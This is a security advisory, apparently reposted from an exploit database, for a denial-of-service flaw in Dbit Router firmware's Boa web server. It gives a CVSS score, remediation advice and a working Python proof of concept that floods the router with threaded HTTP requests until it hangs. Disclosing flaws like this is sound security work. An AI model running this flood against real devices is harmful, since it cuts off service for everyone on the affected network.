Share
## https://sploitus.com/exploit?id=D3844EF0-691D-5A32-8788-F4D28228E9EA
# CVE-2026-36957: Denial of Service via HTTP Flood on Boa Web Server

**CVE ID:** CVE-2026-36957
**Date:** 2026-04-29
**Discoverer:** Kirubel Solomne
**Vendor:** Shenzhen Dibit Network Equipment Co., Ltd.
**Product:** Dbit Router
**Firmware Version:** V1.0.0
**CWE:** CWE-400 - Uncontrolled Resource Consumption

---

## Description

The Dbit Router firmware V1.0.0 is vulnerable to Denial of Service via the Boa web server URI handler. By sending a high-volume flood of HTTP GET requests to non-existent URIs, an attacker can exhaust critical system resources including file descriptors and memory buffers. This results in a kernel deadlock or system hang that disables the web management portal and all routing capabilities.

---

## CVSS Score

**CVSS v3.1 Score: 7.5 (High)**
`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H`

| Metric | Value |
|---|---|
| Attack Vector | Network |
| Attack Complexity | Low |
| Privileges Required | None |
| User Interaction | None |
| Confidentiality Impact | None |
| Integrity Impact | None |
| Availability Impact | High |

---

## Proof of Concept

```python
import requests
import threading

TARGET = "http://192.168.10.1"

def flood(i):
    try:
        requests.get(f"{TARGET}/nonexistent_{i}", timeout=2)
    except:
        pass

threads = []
for i in range(1000):
    t = threading.Thread(target=flood, args=(i,))
    threads.append(t)
    t.start()

for t in threads:
    t.join()

print("Done. Check if router is still responsive.")
```

**Expected Behavior:** Server should limit connections and remain stable.
**Actual Behavior:** Router web interface becomes unresponsive; requires manual reboot.

---

## Impact

- Complete loss of web management interface
- Disruption of all routing capabilities
- Requires manual reboot to restore service
- Network downtime for all connected devices

---

## Remediation

- Implement connection rate limiting on the Boa web server
- Add watchdog timer to recover from deadlock states
- Limit maximum concurrent connections per IP

---

## Disclosure Timeline

| Date | Event |
|---|---|
| 2026-04-29 | Vulnerability discovered |
| 2026-04-29 | Reported to MITRE |
| 2026-04-29 | CVE-2026-36957 assigned |
| 2026-04-29 | Public disclosure |

---

## References

- [MITRE CVE-2026-36957](https://vulners.com/cve/CVE-2026-36957)
- [CWE-400](https://cwe.mitre.org/data/definitions/400.html)
- [Vendor Website](http://dbit.com)